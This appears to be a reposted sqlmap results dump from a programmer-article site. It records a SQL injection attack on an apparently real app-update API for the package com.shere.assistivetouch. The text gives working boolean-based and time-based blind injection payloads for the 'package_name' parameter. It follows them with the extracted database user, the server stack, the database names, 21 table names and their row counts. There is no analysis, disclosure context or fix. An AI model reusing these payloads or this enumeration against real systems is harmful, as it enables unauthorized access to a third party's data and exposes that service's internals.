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程序员文章站 2022-07-03 08:08:05


Parameter: package_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: package_name=com.shere.assistivetouch' AND 9422=9422 AND 'iYFY'='iYFY&version_code=40506&language=cn&channel=xiaomi

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: package_name=com.shere.assistivetouch' OR (SELECT * FROM (SELECT(SLEEP(5)))guFc) AND 'sUVQ'='sUVQ&version_code=40506&language=cn&channel=xiaomi
database management system users [1]:
[*] 'shere1'@'%'

web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] shere8
[*] test

Database: shere8
[21 tables]
| user                 |
| version              |
| advertisement        |
| app_update           |
| blacklist            |
| channel              |
| channel_theme        |
| country              |
| exchange_code        |
| feedback             |
| market_auditing      |
| message              |
| platform             |
| theme                |
| theme_control_center |
| theme_country        |
| theme_evo            |
| theme_platform       |
| theme_sort           |
| theme_zip2           |
| theme_zip3           |

| Table                | Entries |
| theme_country        | 103422  |
| channel_theme        | 3343    |
| theme_zip3           | 429     |
| theme                | 251     |
| country              | 247     |
| exchange_code        | 138     |
| theme_zip2           | 134     |
| message              | 95      |
| theme_platform       | 81      |
| market_auditing      | 60      |
| theme_evo            | 26      |
| channel              | 10      |
| theme_sort           | 9       |
| feedback             | 8       |
| theme_control_center | 7       |
| advertisement        | 3       |
| platform             | 3       |
| `version`            | 1       |